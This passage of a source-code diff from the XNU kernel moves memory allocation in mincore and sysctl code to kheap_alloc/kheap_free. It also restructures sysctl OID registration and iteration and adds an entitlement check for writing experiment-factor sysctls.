-#endif +#endif /* XNU_TARGET_OS_OSX */ return error; } @@ -877,9 +877,9 @@ msync_nocancel(__unused proc_t p, struct msync_nocancel_args *uap, __unused int3 user_map = current_map(); addr = (mach_vm_offset_t) uap->addr; size = (mach_vm_size_t) uap->len; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_msync) | DBG_FUNC_NONE), (uint32_t)(addr >> 32), (uint32_t)(size >> 32), 0, 0, 0); -#endif +#endif /* XNU_TARGET_OS_OSX */ if (mach_vm_range_overflows(addr, size)) { return EINVAL; } @@ -1272,8 +1272,9 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval) req_vec_size_pages = (end - addr) >> effective_page_shift; cur_vec_size_pages = MIN(req_vec_size_pages, (MAX_PAGE_RANGE_QUERY >> effective_page_shift)); + size_t kernel_vec_size = cur_vec_size_pages; - kernel_vec = (void*) _MALLOC(cur_vec_size_pages * sizeof(char), M_TEMP, M_WAITOK | M_ZERO); + kernel_vec = kheap_alloc(KHEAP_TEMP, kernel_vec_size, Z_WAITOK | Z_ZERO); if (kernel_vec == NULL) { return ENOMEM; @@ -1285,10 +1286,11 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval) vec = uap->vec; pqueryinfo_vec_size = cur_vec_size_pages * sizeof(struct vm_page_info_basic); - info = (void*) _MALLOC(pqueryinfo_vec_size, M_TEMP, M_WAITOK); + + info = kheap_alloc(KHEAP_TEMP, pqueryinfo_vec_size, Z_WAITOK); if (info == NULL) { - FREE(kernel_vec, M_TEMP); + kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size); return ENOMEM; } @@ -1366,8 +1368,8 @@ mincore(__unused proc_t p, struct mincore_args *uap, __unused int32_t *retval) first_addr = addr; } - FREE(kernel_vec, M_TEMP); - FREE(info, M_TEMP); + kheap_free(KHEAP_TEMP, info, pqueryinfo_vec_size); + kheap_free(KHEAP_TEMP, kernel_vec, kernel_vec_size); if (error) { return EFAULT; diff --git a/bsd/kern/kern_newsysctl.c b/bsd/kern/kern_newsysctl.c index b6765a202..481e11cbd 100644 --- a/bsd/kern/kern_newsysctl.c +++ b/bsd/kern/kern_newsysctl.c @@ -67,6 +67,7 @@ */ +#include #include #include #include @@ -77,9 +78,13 @@ #include #include +#include + #include #include +#include + #if CONFIG_MACF #include #endif @@ -89,9 +94,9 @@ #include #endif /* defined(HAS_APPLE_PAC) */ -lck_grp_t * sysctl_lock_group = NULL; -lck_rw_t * sysctl_geometry_lock = NULL; -lck_mtx_t * sysctl_unlocked_node_lock = NULL; +static LCK_GRP_DECLARE(sysctl_lock_group, "sysctl"); +static LCK_RW_DECLARE(sysctl_geometry_lock, &sysctl_lock_group); +static LCK_MTX_DECLARE(sysctl_unlocked_node_lock, &sysctl_lock_group); /* * Conditionally allow dtrace to see these functions for debugging purposes. @@ -135,7 +140,8 @@ int userland_sysctl(boolean_t string_is_canonical, int *name, u_int namelen, struct sysctl_req *req, size_t *retval); -struct sysctl_oid_list sysctl__children; /* root list */ +SECURITY_READ_ONLY_LATE(struct sysctl_oid_list) sysctl__children; /* root list */ +__SYSCTL_EXTENSION_NODE(); /* * Initialization of the MIB tree. @@ -143,14 +149,104 @@ struct sysctl_oid_list sysctl__children; /* root list */ * Order by number in each list. */ +static void +sysctl_register_oid_locked(struct sysctl_oid *new_oidp, + struct sysctl_oid *oidp) +{ + struct sysctl_oid_list *parent = new_oidp->oid_parent; + struct sysctl_oid_list *parent_rw = NULL; + struct sysctl_oid *p, **prevp; + + p = SLIST_FIRST(parent); + if (p && p->oid_number == OID_MUTABLE_ANCHOR) { + parent_rw = p->oid_arg1; + } + + if (oidp->oid_number == OID_AUTO) { + int n = OID_AUTO_START; + + /* + * If this oid has a number OID_AUTO, give it a number which + * is greater than any current oid. Make sure it is at least + * OID_AUTO_START to leave space for pre-assigned oid numbers. + */ + + SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) { + if (p->oid_number >= n) { + n = p->oid_number + 1; + } + } + + if (parent_rw) { + SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) { + if (p->oid_number >= n) { + n = p->oid_number + 1; + } + } + } + + /* + * Reflect the number in an allocated OID into the template + * of the caller for sysctl_unregister_oid() compares. + */ + oidp->oid_number = new_oidp->oid_number = n; + } else { + /* + * Insert the oid into the parent's list in order. + */ + SLIST_FOREACH_PREVPTR(p, prevp, parent, oid_link) { + if (oidp->oid_number == p->oid_number) { + panic("attempting to register a sysctl at previously registered slot : %d", + oidp->oid_number); + } else if (oidp->oid_number < p->oid_number) { + break; + } + } + + if (parent_rw) { + SLIST_FOREACH_PREVPTR(p, prevp, parent_rw, oid_link) { + if (oidp->oid_number == p->oid_number) { + panic("attempting to register a sysctl at previously registered slot : %d", + oidp->oid_number); + } else if (oidp->oid_number < p->oid_number) { + break; + } + } + } + } + +#if defined(HAS_APPLE_PAC) + if (oidp->oid_handler) { + /* + * Sign oid_handler address-discriminated upon installation to make it + * harder to replace with an arbitrary function pointer. Blend with + * a hash of oid_arg1 for robustness against memory corruption. + */ + oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler, + ptrauth_key_function_pointer, + ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)), + ptrauth_key_function_pointer, + ptrauth_blend_discriminator(&oidp->oid_handler, + os_hash_kernel_pointer(oidp->oid_arg1))); + } +#endif /* defined(HAS_APPLE_PAC) */ + + SLIST_NEXT(oidp, oid_link) = *prevp; + *prevp = oidp; +} + void sysctl_register_oid(struct sysctl_oid *new_oidp) { - struct sysctl_oid *oidp = NULL; - struct sysctl_oid_list *parent = new_oidp->oid_parent; - struct sysctl_oid *p; - struct sysctl_oid *q; - int n; + struct sysctl_oid *oidp; + + if (new_oidp->oid_number < OID_AUTO) { + panic("trying to register a node %p with an invalid oid_number: %d", + new_oidp, new_oidp->oid_number); + } + if (new_oidp->oid_kind & CTLFLAG_PERMANENT) { + panic("Use sysctl_register_oid_early to register permanent nodes"); + } /* * The OID can be old-style (needs copy), new style without an earlier @@ -161,10 +257,11 @@ sysctl_register_oid(struct sysctl_oid *new_oidp) if (!(new_oidp->oid_kind & CTLFLAG_OID2)) { #if __x86_64__ /* - * XXX: M_TEMP is perhaps not the most apropriate zone, as it + * XXX: KHEAP_DEFAULT is perhaps not the most apropriate zone, as it * XXX: will subject us to use-after-free by other consumers. */ - MALLOC(oidp, struct sysctl_oid *, sizeof(*oidp), M_TEMP, M_WAITOK | M_ZERO); + oidp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct sysctl_oid), + Z_WAITOK | Z_ZERO); if (oidp == NULL) { return; /* reject: no memory */ } @@ -175,7 +272,7 @@ sysctl_register_oid(struct sysctl_oid *new_oidp) * Note: We may want to set the oid_descr to the * oid_name (or "") at some future date. */ - *oidp = *new_oidp; + memcpy(oidp, new_oidp, offsetof(struct sysctl_oid, oid_descr)); #else panic("Old style sysctl without a version number isn't supported"); #endif @@ -191,68 +288,30 @@ sysctl_register_oid(struct sysctl_oid *new_oidp) } } - /* Get the write lock to modify the geometry */ - lck_rw_lock_exclusive(sysctl_geometry_lock); - - /* - * If this oid has a number OID_AUTO, give it a number which - * is greater than any current oid. Make sure it is at least - * OID_AUTO_START to leave space for pre-assigned oid numbers. - */ - if (oidp->oid_number == OID_AUTO) { - /* First, find the highest oid in the parent list >OID_AUTO_START-1 */ - n = OID_AUTO_START; - SLIST_FOREACH(p, parent, oid_link) { - if (p->oid_number > n) { - n = p->oid_number; - } - } - oidp->oid_number = n + 1; - /* - * Reflect the number in an llocated OID into the template - * of the caller for sysctl_unregister_oid() compares. - */ - if (oidp != new_oidp) { - new_oidp->oid_number = oidp->oid_number; - } - } + lck_rw_lock_exclusive(&sysctl_geometry_lock); + sysctl_register_oid_locked(new_oidp, oidp); + lck_rw_unlock_exclusive(&sysctl_geometry_lock); +} -#if defined(HAS_APPLE_PAC) - if (oidp->oid_handler) { - /* - * Sign oid_handler address-discriminated upon installation to make it - * harder to replace with an arbitrary function pointer. Blend with - * a hash of oid_arg1 for robustness against memory corruption. - */ - oidp->oid_handler = ptrauth_auth_and_resign(oidp->oid_handler, - ptrauth_key_function_pointer, - ptrauth_function_pointer_type_discriminator(typeof(oidp->oid_handler)), - ptrauth_key_function_pointer, - ptrauth_blend_discriminator(&oidp->oid_handler, - os_hash_kernel_pointer(oidp->oid_arg1))); - } -#endif /* defined(HAS_APPLE_PAC) */ +__startup_func +void +sysctl_register_oid_early(struct sysctl_oid *oidp) +{ + assert((oidp->oid_kind & CTLFLAG_OID2) && + (oidp->oid_kind & CTLFLAG_PERMANENT) && + oidp->oid_version == SYSCTL_OID_VERSION); + assert(startup_phase < STARTUP_SUB_SYSCTL); /* - * Insert the oid into the parent's list in order. + * Clear the flag so that callers can use sysctl_register_oid_early + * again if they wish to register their node. */ - q = NULL; - SLIST_FOREACH(p, parent, oid_link) { - if (oidp->oid_number == p->oid_number) { - panic("attempting to register a sysctl at previously registered slot : %d", oidp->oid_number); - } else if (oidp->oid_number < p->oid_number) { - break; - } - q = p; - } - if (q) { - SLIST_INSERT_AFTER(q, oidp, oid_link); - } else { - SLIST_INSERT_HEAD(parent, oidp, oid_link); + if (oidp->oid_kind & CTLFLAG_NOAUTO) { + oidp->oid_kind &= ~CTLFLAG_NOAUTO; + return; } - /* Release the write lock */ - lck_rw_unlock_exclusive(sysctl_geometry_lock); + sysctl_register_oid_locked(oidp, oidp); } void @@ -261,12 +320,20 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) struct sysctl_oid *removed_oidp = NULL; /* OID removed from tree */ #if __x86_64__ struct sysctl_oid *old_oidp = NULL; /* OID compatibility copy */ -#else - struct sysctl_oid *const old_oidp = NULL; #endif + struct sysctl_oid_list *lsp; /* Get the write lock to modify the geometry */ - lck_rw_lock_exclusive(sysctl_geometry_lock); + lck_rw_lock_exclusive(&sysctl_geometry_lock); + + lsp = oidp->oid_parent; + if (SLIST_FIRST(lsp) && SLIST_FIRST(lsp)->oid_number == OID_MUTABLE_ANCHOR) { + lsp = SLIST_FIRST(lsp)->oid_arg1; + } + + if (oidp->oid_kind & CTLFLAG_PERMANENT) { + panic("Trying to unregister permanent sysctl %p", oidp); + } if (!(oidp->oid_kind & CTLFLAG_OID2)) { #if __x86_64__ @@ -276,13 +343,13 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) * partial structure; when we find a match, we remove it * normally and free the memory. */ - SLIST_FOREACH(old_oidp, oidp->oid_parent, oid_link) { + SLIST_FOREACH(old_oidp, lsp, oid_link) { if (!memcmp(&oidp->oid_number, &old_oidp->oid_number, (offsetof(struct sysctl_oid, oid_descr) - offsetof(struct sysctl_oid, oid_number)))) { break; } } if (old_oidp != NULL) { - SLIST_REMOVE(old_oidp->oid_parent, old_oidp, sysctl_oid, oid_link); + SLIST_REMOVE(lsp, old_oidp, sysctl_oid, oid_link); removed_oidp = old_oidp; } #else @@ -293,7 +360,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) switch (oidp->oid_version) { case SYSCTL_OID_VERSION: /* We can just remove the OID directly... */ - SLIST_REMOVE(oidp->oid_parent, oidp, sysctl_oid, oid_link); + SLIST_REMOVE(lsp, oidp, sysctl_oid, oid_link); removed_oidp = oidp; break; default: @@ -303,7 +370,7 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) } #if defined(HAS_APPLE_PAC) - if (removed_oidp && removed_oidp->oid_handler && old_oidp == NULL) { + if (removed_oidp && removed_oidp->oid_handler) { /* * Revert address-discriminated signing performed by * sysctl_register_oid() (in case this oid is registered again). @@ -326,47 +393,17 @@ sysctl_unregister_oid(struct sysctl_oid *oidp) * Note: oidp could be NULL if it wasn't found. */ while (removed_oidp && removed_oidp->oid_refcnt) { - lck_rw_sleep(sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE, &removed_oidp->oid_refcnt, THREAD_UNINT); + lck_rw_sleep(&sysctl_geometry_lock, LCK_SLEEP_EXCLUSIVE, + &removed_oidp->oid_refcnt, THREAD_UNINT); } /* Release the write lock */ - lck_rw_unlock_exclusive(sysctl_geometry_lock); + lck_rw_unlock_exclusive(&sysctl_geometry_lock); - if (old_oidp != NULL) { #if __x86_64__ - /* If it was allocated, free it after dropping the lock */ - FREE(old_oidp, M_TEMP); + /* If it was allocated, free it after dropping the lock */ + kheap_free(KHEAP_DEFAULT, old_oidp, sizeof(struct sysctl_oid)); #endif - } -} - -/* - * Bulk-register all the oids in a linker_set. - */ -void -sysctl_register_set(const char *set) -{ - struct sysctl_oid **oidpp, *oidp; - - LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) { - oidp = *oidpp; - if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) { - sysctl_register_oid(oidp); - } - } -} - -void -sysctl_unregister_set(const char *set) -{ - struct sysctl_oid **oidpp, *oidp; - - LINKER_SET_FOREACH(oidpp, struct sysctl_oid **, set) { - oidp = *oidpp; - if (!(oidp->oid_kind & CTLFLAG_NOAUTO)) { - sysctl_unregister_oid(oidp); - } - } } /* @@ -379,28 +416,6 @@ sysctl_register_fixed(void) } #endif -/* - * Register the kernel's oids on startup. - */ - -void -sysctl_early_init(void) -{ - /* - * Initialize the geometry lock for reading/modifying the - * sysctl tree. This is done here because IOKit registers - * some sysctl's before bsd_init() would otherwise perform - * subsystem initialization. - */ - - sysctl_lock_group = lck_grp_alloc_init("sysctl", NULL); - sysctl_geometry_lock = lck_rw_alloc_init(sysctl_lock_group, NULL); - sysctl_unlocked_node_lock = lck_mtx_alloc_init(sysctl_lock_group, NULL); - - sysctl_register_set("__sysctl_set"); - sysctl_load_devicetree_entries(); -} - /* * New handler interface * If the sysctl caller (user mode or kernel mode) is interested in the @@ -553,6 +568,94 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch return error; } +/* + * SYSCTL_OID enumerators + * + * Because system OIDs are immutable, they are composed of 2 lists hanging from + * a first dummy OID_MUTABLE_ANCHOR node that has an immutable list hanging from + * its `oid_parent` field and a mutable list hanging from its oid_arg1 one. + * + * Those enumerators abstract away the implicit merging of those two lists in + * two possible order: + * - oid_number order (which will interleave both sorted lists) + * - system order which will list the immutable list first, + * and the mutable list second. + */ +struct sysctl_oid_iterator { + struct sysctl_oid *a; + struct sysctl_oid *b; +}; + +static struct sysctl_oid_iterator +sysctl_oid_iterator_begin(struct sysctl_oid_list *l) +{ + struct sysctl_oid_iterator it = { }; + struct sysctl_oid *a = SLIST_FIRST(l); + + if (a == NULL) { + return it; + } + + if (a->oid_number == OID_MUTABLE_ANCHOR) { + it.a = SLIST_NEXT(a, oid_link); + it.b = SLIST_FIRST((struct sysctl_oid_list *)a->oid_arg1); + } else { + it.a = a; + } + return it; +} + +static struct sysctl_oid * +sysctl_oid_iterator_next_num_order(struct sysctl_oid_iterator *it) +{ + struct sysctl_oid *a = it->a; + struct sysctl_oid *b = it->b; + + if (a == NULL && b == NULL) { + return NULL; + } + + if (a == NULL) { + it->b = SLIST_NEXT(b, oid_link); + return b; + } + + if (b == NULL || a->oid_number <= b->oid_number) { + it->a = SLIST_NEXT(a, oid_link); + return a; + } + + it->b = SLIST_NEXT(b, oid_link); + return b; +} + +#define SYSCTL_OID_FOREACH_NUM_ORDER(oidp, l) \ + for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \ + ((oidp) = sysctl_oid_iterator_next_num_order(&it)); ) + +static struct sysctl_oid * +sysctl_oid_iterator_next_system_order(struct sysctl_oid_iterator *it) +{ + struct sysctl_oid *a = it->a; + struct sysctl_oid *b = it->b; + + if (a) { + it->a = SLIST_NEXT(a, oid_link); + return a; + } + + if (b) { + it->b = SLIST_NEXT(b, oid_link); + return b; + } + + return NULL; +} + +#define SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) \ + for (struct sysctl_oid_iterator it = sysctl_oid_iterator_begin(l); \ + ((oidp) = sysctl_oid_iterator_next_system_order(&it)); ) + /* * "Staff-functions" * @@ -599,38 +702,50 @@ sysctl_io_opaque(struct sysctl_req *req, void *pValue, size_t valueSize, int *ch STATIC void sysctl_sysctl_debug_dump_node(struct sysctl_oid_list *l, int i) { - int k; struct sysctl_oid *oidp; + struct sysctl_oid_list *lp; + const char *what; - SLIST_FOREACH(oidp, l, oid_link) { - for (k = 0; k < i; k++) { - printf(" "); + SYSCTL_OID_FOREACH_SYS_ORDER(oidp, l) { + switch (oidp->oid_kind & CTLTYPE) { + case CTLTYPE_NODE: + lp = oidp->oid_arg1; + what = "Node "; + if (lp && SLIST_FIRST(lp) && + SLIST_FIRST(lp)->oid_number == OID_MUTABLE_ANCHOR) { + what = "NodeExt"; + } else { + } + break; + case CTLTYPE_INT: + what = "Int "; + break; + case CTLTYPE_STRING: + what = "String "; + break; + case CTLTYPE_QUAD: + what = "Quad "; + break; + case CTLTYPE_OPAQUE: + what = "Opaque "; + break; + default: + what = "Unknown"; + break; } - printf("%d %s ", oidp->oid_number, oidp->oid_name); - - printf("%c%c%c", + printf("%*s%-3d[%c%c%c%c%c] %s %s\n", i, "", oidp->oid_number, oidp->oid_kind & CTLFLAG_LOCKED ? 'L':' ', oidp->oid_kind & CTLFLAG_RD ? 'R':' ', - oidp->oid_kind & CTLFLAG_WR ? 'W':' '); - - if (oidp->oid_handler) { - printf(" *Handler"); - } + oidp->oid_kind & CTLFLAG_WR ? 'W':' ', + oidp->oid_kind & CTLFLAG_PERMANENT ? ' ':'*', + oidp->oid_handler ? 'h' : ' ', + what, oidp->oid_name); - switch (oidp->oid_kind & CTLTYPE) { - case CTLTYPE_NODE: - printf(" Node\n"); + if ((oidp->oid_kind & CTLTYPE) == CTLTYPE_NODE) { if (!oidp->oid_handler) { - sysctl_sysctl_debug_dump_node( - oidp->oid_arg1, i + 2); + sysctl_sysctl_debug_dump_node(lp, i + 2); } - break; - case CTLTYPE_INT: printf(" Int\n"); break; - case CTLTYPE_STRING: printf(" String\n"); break; - case CTLTYPE_QUAD: printf(" Quad\n"); break; - case CTLTYPE_OPAQUE: printf(" Opaque/struct\n"); break; - default: printf("\n"); } } } @@ -656,9 +771,9 @@ STATIC int sysctl_sysctl_debug(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, __unused struct sysctl_req *req) { - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); sysctl_sysctl_debug_dump_node(&sysctl__children, 0); - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return ENOENT; } @@ -722,7 +837,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, struct sysctl_oid_list *lsp = &sysctl__children, *lsp2; char tempbuf[10] = {}; - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); while (namelen) { if (!lsp) { snprintf(tempbuf, sizeof(tempbuf), "%d", *name); @@ -733,7 +848,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, error = SYSCTL_OUT(req, tempbuf, strlen(tempbuf)); } if (error) { - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } namelen--; @@ -741,7 +856,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, continue; } lsp2 = 0; - SLIST_FOREACH(oid, lsp, oid_link) { + SYSCTL_OID_FOREACH_NUM_ORDER(oid, lsp) { if (oid->oid_number != *name) { continue; } @@ -754,7 +869,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, strlen(oid->oid_name)); } if (error) { - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } @@ -774,7 +889,7 @@ sysctl_sysctl_name(__unused struct sysctl_oid *oidp, void *arg1, int arg2, } lsp = lsp2; } - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return SYSCTL_OUT(req, "", 1); } @@ -819,7 +934,7 @@ sysctl_sysctl_next_ls(struct sysctl_oid_list *lsp, int *name, u_int namelen, struct sysctl_oid *oidp; *len = level; - SLIST_FOREACH(oidp, lsp, oid_link) { + SYSCTL_OID_FOREACH_NUM_ORDER(oidp, lsp) { *next = oidp->oid_number; *oidpp = oidp; @@ -932,9 +1047,9 @@ sysctl_sysctl_next(__unused struct sysctl_oid *oidp, void *arg1, int arg2, struct sysctl_oid_list *lsp = &sysctl__children; int newoid[CTL_MAXNAME] = {}; - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); i = sysctl_sysctl_next_ls(lsp, name, namelen, newoid, &j, 1, &oid); - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); if (i) { return ENOENT; } @@ -966,10 +1081,10 @@ SYSCTL_NODE(_sysctl, 2, next, CTLFLAG_RD | CTLFLAG_LOCKED, sysctl_sysctl_next, " STATIC int name2oid(char *name, int *oid, size_t *len) { - char i; + struct sysctl_oid_iterator it; struct sysctl_oid *oidp; - struct sysctl_oid_list *lsp = &sysctl__children; char *p; + char i; if (!*name) { return ENOENT; @@ -990,11 +1105,12 @@ name2oid(char *name, int *oid, size_t *len) *p = '\0'; } - oidp = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(&sysctl__children); + oidp = sysctl_oid_iterator_next_system_order(&it); while (oidp && *len < CTL_MAXNAME) { if (strcmp(name, oidp->oid_name)) { - oidp = SLIST_NEXT(oidp, oid_link); + oidp = sysctl_oid_iterator_next_system_order(&it); continue; } *oid++ = oidp->oid_number; @@ -1012,8 +1128,9 @@ name2oid(char *name, int *oid, size_t *len) break; } - lsp = (struct sysctl_oid_list *)oidp->oid_arg1; - oidp = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(oidp->oid_arg1); + oidp = sysctl_oid_iterator_next_system_order(&it); + *p = i; /* restore */ name = p + 1; for (p = name; *p && *p != '.'; p++) { @@ -1081,14 +1198,14 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1, return ENAMETOOLONG; } - MALLOC(p, char *, req->newlen + 1, M_TEMP, M_WAITOK); + p = kheap_alloc(KHEAP_TEMP, req->newlen + 1, Z_WAITOK); if (!p) { return ENOMEM; } error = SYSCTL_IN(req, p, req->newlen); if (error) { - FREE(p, M_TEMP); + kheap_free(KHEAP_TEMP, p, req->newlen + 1); return error; } @@ -1098,11 +1215,11 @@ sysctl_sysctl_name2oid(__unused struct sysctl_oid *oidp, __unused void *arg1, * Note: We acquire and release the geometry lock here to * avoid making name2oid needlessly complex. */ - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); error = name2oid(p, oid, &len); - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); - FREE(p, M_TEMP); + kheap_free(KHEAP_TEMP, p, req->newlen + 1); if (error) { return error; @@ -1160,11 +1277,13 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2, int error = ENOENT; /* default error: not found */ u_int namelen = arg2; u_int indx; + struct sysctl_oid_iterator it; struct sysctl_oid *oid; - struct sysctl_oid_list *lsp = &sysctl__children; - lck_rw_lock_shared(sysctl_geometry_lock); - oid = SLIST_FIRST(lsp); + lck_rw_lock_shared(&sysctl_geometry_lock); + + it = sysctl_oid_iterator_begin(&sysctl__children); + oid = sysctl_oid_iterator_next_system_order(&it); indx = 0; while (oid && indx < CTL_MAXNAME) { @@ -1177,8 +1296,8 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2, if (indx == namelen) { goto found; } - lsp = (struct sysctl_oid_list *)oid->oid_arg1; - oid = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(oid->oid_arg1); + oid = sysctl_oid_iterator_next_system_order(&it); } else { if (indx != namelen) { error = EISDIR; @@ -1187,7 +1306,7 @@ sysctl_sysctl_oidfmt(__unused struct sysctl_oid *oidp, void *arg1, int arg2, goto found; } } else { - oid = SLIST_NEXT(oid, oid_link); + oid = sysctl_oid_iterator_next_system_order(&it); } } /* Not found */ @@ -1204,7 +1323,7 @@ found: strlen(oid->oid_fmt) + 1); } err: - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } @@ -1448,25 +1567,46 @@ sysctl_new_user(struct sysctl_req *req, void *p, size_t l) return error; } +#define WRITE_EXPERIMENT_FACTORS_ENTITLEMENT "com.apple.private.write-kr-experiment-factors" +/* + * Is the current task allowed to write to experiment factors? + * tasks with the WRITE_EXPERIMENT_FACTORS_ENTITLEMENT are always allowed to write these. + * In the development / debug kernel we also allow root to write them. + */ +STATIC bool +can_write_experiment_factors(__unused struct sysctl_req *req) +{ + if (IOTaskHasEntitlement(current_task(), WRITE_EXPERIMENT_FACTORS_ENTITLEMENT)) { + return true; + } +#if DEBUG || DEVELOPMENT + return !proc_suser(req->p); +#else + return false; +#endif /* DEBUG || DEVELOPMENT */ +} + /* * Traverse our tree, and find the right node, execute whatever it points * at, and return the resulting error code. */ int -sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestring, size_t namestringlen, int *name, size_t namelen, struct sysctl_req *req) +sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, + char *namestring, size_t namestringlen, + int *name, size_t namelen, struct sysctl_req *req) { u_int indx; int i; + struct sysctl_oid_iterator it; struct sysctl_oid *oid; - struct sysctl_oid_list *lsp = &sysctl__children; sysctl_handler_t oid_handler = NULL; int error; boolean_t unlocked_node_found = FALSE; boolean_t namestring_started = FALSE; /* Get the read lock on the geometry */ - lck_rw_lock_shared(sysctl_geometry_lock); + lck_rw_lock_shared(&sysctl_geometry_lock); if (string_is_canonical) { /* namestring is actually canonical, name/namelen needs to be populated */ @@ -1476,7 +1616,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri } } - oid = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(&sysctl__children); + oid = sysctl_oid_iterator_next_system_order(&it); indx = 0; while (oid && indx < CTL_MAXNAME) { @@ -1524,8 +1665,8 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri goto err; } - lsp = (struct sysctl_oid_list *)oid->oid_arg1; - oid = SLIST_FIRST(lsp); + it = sysctl_oid_iterator_begin(oid->oid_arg1); + oid = sysctl_oid_iterator_next_system_order(&it); } else { if (indx != namelen) { error = EISDIR; @@ -1534,7 +1675,7 @@ sysctl_root(boolean_t from_kernel, boolean_t string_is_canonical, char *namestri goto found; } } else { - oid = SLIST_NEXT(oid, oid_link); + oid = sysctl_oid_iterator_next_system_order(&it); } } error = ENOENT; @@ -1582,18 +1723,30 @@ found: goto err; } - /* - * This is where legacy enforcement of permissions occurs. If the - * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but - * root from writing new values down. If local enforcement happens - * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY. In - * addition, if the leaf node is set this way, then in order to do - * specific enforcement, it has to be of type SYSCTL_PROC. - */ - if (!(oid->oid_kind & CTLFLAG_ANYBODY) && - req->newptr && req->p && - (error = proc_suser(req->p))) { - goto err; + if (req->newptr && req->p) { + if (oid->oid_kind & CTLFLAG_EXPERIMENT) { + /* + * Experiment factors have different permissions since they need to be + * writable by procs with WRITE_EXPERIMENT_FACTORS_ENTITLEMENT. + */ + if (!can_write_experiment_factors(req)) { + error = (EPERM); + goto err; + } + } else { + /* + * This is where legacy enforcement of permissions occurs. If the + * flag does not say CTLFLAG_ANYBODY, then we prohibit anyone but + * root from writing new values down. If local enforcement happens + * at the leaf node, then it needs to be set as CTLFLAG_ANYBODY. In + * addition, if the leaf node is set this way, then in order to do + * specific enforcement, it has to be of type SYSCTL_PROC. + */ + if (!(oid->oid_kind & CTLFLAG_ANYBODY) && + (error = proc_suser(req->p))) { + goto err; + } + } } /* @@ -1612,9 +1765,11 @@ found: * not prevent other calls into handlers or calls to manage the * geometry elsewhere from blocking... */ - OSAddAtomic(1, &oid->oid_refcnt); + if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) { + OSAddAtomic(1, &oid->oid_refcnt); + } - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); #if CONFIG_MACF if (!from_kernel) { @@ -1637,7 +1792,7 @@ found: * may be into code whose reentrancy is protected by it. */ if (unlocked_node_found) { - lck_mtx_lock(sysctl_unlocked_node_lock); + lck_mtx_lock(&sysctl_unlocked_node_lock); } #if defined(HAS_APPLE_PAC) @@ -1660,7 +1815,7 @@ found: error = i; if (unlocked_node_found) { - lck_mtx_unlock(sysctl_unlocked_node_lock); + lck_mtx_unlock(&sysctl_unlocked_node_lock); } #if CONFIG_MACF @@ -1682,13 +1837,16 @@ dropref: * barrier to avoid waking every time through on "hot" * OIDs. */ - lck_rw_lock_shared(sysctl_geometry_lock); - if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) { - wakeup(&oid->oid_refcnt); + lck_rw_lock_shared(&sysctl_geometry_lock); + + if ((oid->oid_kind & CTLFLAG_PERMANENT) == 0) { + if (OSAddAtomic(-1, &oid->oid_refcnt) == 1) { + wakeup(&oid->oid_refcnt); + } } err: - lck_rw_done(sysctl_geometry_lock); + lck_rw_done(&sysctl_geometry_lock); return error; } @@ -1767,7 +1925,7 @@ sysctl(proc_t p, struct sysctl_args *uap, __unused int32_t *retval) } } - MALLOC(namestring, char *, namestringlen, M_TEMP, M_WAITOK); + namestring = kheap_alloc(KHEAP_TEMP, namestringlen, 